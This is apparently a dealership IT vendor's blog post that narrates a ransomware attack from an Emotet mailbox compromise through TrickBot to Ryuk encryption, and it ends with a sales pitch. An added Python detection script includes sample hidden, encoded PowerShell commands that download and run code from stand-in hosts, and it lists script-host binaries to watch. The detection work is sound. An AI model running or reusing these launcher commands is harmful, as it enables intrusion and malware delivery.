The Timeline of a Ransomware Attack
Why are dealerships facing more cyberattacks than ever before? We’re living in a world that runs on data, and a whole lot of it. Every day, more than 400 billion gigabytes of data are created. By one widely quoted estimate, that works out to roughly 1.7 megabytes per second for every person on Earth.
Amazing? Yes.
Dangerous? Also yes.
While we’re enjoying immediate access to pretty much everything, the bad guys are too. Cybercriminals are collecting our data just as fast as we create it.
One of the bad guys’ go-to tools is called ransomware. This malware encrypts your files and systems, locking you out, and then demands a payment for the key that restores your access and your data.
Setting Up the Attack
Like many attacks, this one began in the shadows. A billing clerk’s mailbox was quietly compromised by Emotet, a stealthy malware loader built to steal credentials, harvest email conversations, and deliver follow-on malware that does much worse.
It lived undetected within the dealership’s systems for 90 days, harvesting everything it could. No one noticed, and that was by design: the platform was built to stay hidden and stay silent.
Day One: The Phish
Just before 5 p.m., the finance manager received an email from the billing clerk. It looked harmless: it came from the clerk’s real account, and the subject line and sender name matched earlier messages in the same conversation. Unfortunately, this was no ordinary message.
Hiding in plain sight, the attackers had inserted their message into an existing email thread from the compromised mailbox, a technique known as email thread hijacking, so no spoofed sender was needed. The email carried a Word document that ran a malicious macro as soon as the file was opened and macros were enabled. Within ten minutes, the TrickBot malware had a foothold on the network and was spreading fast, harvesting credentials and reaching into point-of-sale systems and sensitive financial data.
All undetected.
Day Two: The Invasion
This wasn’t an in-and-out operation. It was a full-scale, stealthy invasion. The attackers moved laterally through the network, collecting more credentials as they went, wiped out the backups, and staged the encryption of critical systems. The goal was not random chaos but leverage: with no backups left, the dealership would have no way to recover except through the attackers.
Day Three: The Lockdown
The invasion went off without a hitch. With the network wide open, the attackers used PowerShell Empire, a post-exploitation framework, to push the Ryuk ransomware out across the entire domain. Ryuk encrypted most of the infrastructure, ensuring that immediate recovery would be impossible. In a matter of hours, only four of the 29 servers were left standing.
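As an added example (not part of the original post, and not Proton’s tooling), the following Python script shows what the two behaviours described in Day One and Day Three look like in endpoint telemetry, and how a simple triage rule catches them: an Office application spawning a script interpreter, which is how a malicious macro hands off to its downloader, and a hidden, encoded PowerShell launcher of the kind PowerShell Empire generates. The event records, host names, user names and URLs are constructed for the example, and the field set is a simplified Sysmon process-creation record rather than a real log format.

```python
"""Triage process-creation events for the two behaviours in the timeline above.

Added example; every record below is constructed, not taken from a real incident.
"""
import base64
from dataclasses import dataclass
from typing import Optional

# Office binaries that host VBA macros.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and living-off-the-land binaries an Office process should never launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}


@dataclass
class ProcessEvent:
    """The subset of Sysmon Event ID 1 (process create) fields the rules need."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _is_switch(tok: str, full: str, min_len: int) -> bool:
    """powershell.exe accepts any prefix of a parameter name of at least min_len
    characters, so -enc, -ec and -e all select -EncodedCommand."""
    name = tok.lstrip("-/").lower()
    return len(name) >= min_len and full.startswith(name)


def powershell_indicators(command_line: str) -> dict:
    """Pull out the switches stagers combine: an encoded command together with a
    hidden window, a skipped profile, or a bypassed execution policy."""
    toks = command_line.split()
    found = {"encoded": None, "hidden": False, "noprofile": False, "bypass": False}
    for i, tok in enumerate(toks):
        if not tok.startswith(("-", "/")):
            continue
        raw_next = toks[i + 1] if i + 1 < len(toks) else ""
        nxt = raw_next.strip("\"'").lower()
        if _is_switch(tok, "encodedcommand", 1):
            found["encoded"] = raw_next
        elif _is_switch(tok, "windowstyle", 1) and nxt in {"hidden", "hid", "h", "1"}:
            found["hidden"] = True
        elif _is_switch(tok, "noprofile", 3):
            found["noprofile"] = True
        elif (_is_switch(tok, "executionpolicy", 2) or tok.lower() == "-ep") \
                and nxt in {"bypass", "unrestricted"}:
            found["bypass"] = True
    return found


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script; None if it does not parse."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events) -> list:
    """Return one finding dict per matched rule, in event order."""
    findings = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            findings.append({"rule": "office_spawned_script_host", "host": ev.host,
                             "user": ev.user, "detail": f"{parent} -> {child}: {ev.command_line}"})
        if child in {"powershell.exe", "pwsh.exe"}:
            ind = powershell_indicators(ev.command_line)
            if ind["encoded"] is not None and (ind["hidden"] or ind["noprofile"] or ind["bypass"]):
                decoded = decode_encoded_command(ind["encoded"]) or "<not valid UTF-16LE base64>"
                findings.append({"rule": "encoded_hidden_powershell", "host": ev.host,
                                 "user": ev.user, "detail": decoded})
    return findings


# Constructed sample data (hypothetical hosts, users and URLs).
LAUNCHER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/launcher')"
LAUNCHER_B64 = base64.b64encode(LAUNCHER_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    # Day One: the macro in the Word attachment pulls the first stage down.
    ProcessEvent("FIN-MGR-PC", "DEALER\\fmanager", WORD, PS,
                 "powershell -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://stage1.example.invalid/doc')\""),
    # Benign: Word launching its print helper also shows an Office parent.
    ProcessEvent("FIN-MGR-PC", "DEALER\\fmanager", WORD, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    # Day Three: an Empire-style launcher started on a server as a service.
    ProcessEvent("DC01", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\services.exe", PS,
                 f"powershell -noP -sta -w 1 -enc {LAUNCHER_B64}"),
    # Benign: an admin's backup script, no encoded payload, no hidden window.
    ProcessEvent("WS-12", "DEALER\\itadmin", r"C:\Windows\explorer.exe", PS,
                 r"powershell -NoProfile -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['detail']}")
```

The second rule keys on switch combinations rather than on Empire’s exact launcher string, because powershell.exe accepts any unambiguous prefix of a parameter name (-e, -ec and -enc all mean -EncodedCommand), so a match on one spelling is trivial to evade. Decoding the payload, as the rule does, also hands the responder the stager URL to block.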
Day Four: The Fallout
Employees walked in to start their day and were greeted by darkness. Screens were either completely down or displayed a single word: Ryuk. The dealer management system (DMS) was gone, along with access to customer records, repair orders (ROs), and deals. Operations hadn’t just slowed down; they had stopped completely.
Day Five: The Response
With all internal options exhausted, it was time to call for help. Enter Proton. Containment began immediately. Within just 36 hours, the Proton response team had delivered and installed more than 100 new PCs, and operations resumed.
This story ends in a recovery, but everything could have been prevented before it began. The attack started months earlier with a single compromised mailbox that went unnoticed for 90 days. That’s not a technology failure; it’s a human one. Don’t wait until calling for help is your last option. Take control of your cybersecurity now.
Train your team, test your systems, and think proactively about your security plan. If your dealership is hit by ransomware, the warning signs may not present themselves, but the ransom note sure will.
Let’s Talk
Together in your 20-minute free consultation, we’ll:
- Discuss your current IT posture and goals
- Review tactics you could implement today to improve your overall results
- Discuss how Proton Dealership IT may be able to help or point you to valuable tools and resources
In order to effectively review your dealership and IT challenges prior to the call, please tell us a bit about you first.